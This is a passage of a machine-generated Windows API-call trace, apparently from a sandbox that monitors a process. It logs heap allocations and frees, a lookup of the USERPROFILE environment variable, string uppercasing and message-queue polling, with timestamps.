lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0221.793] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854470 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0221.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0221.794] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0221.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0221.795] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0221.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0221.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0221.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0221.797] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0221.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0221.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0221.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0221.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0221.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0221.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: 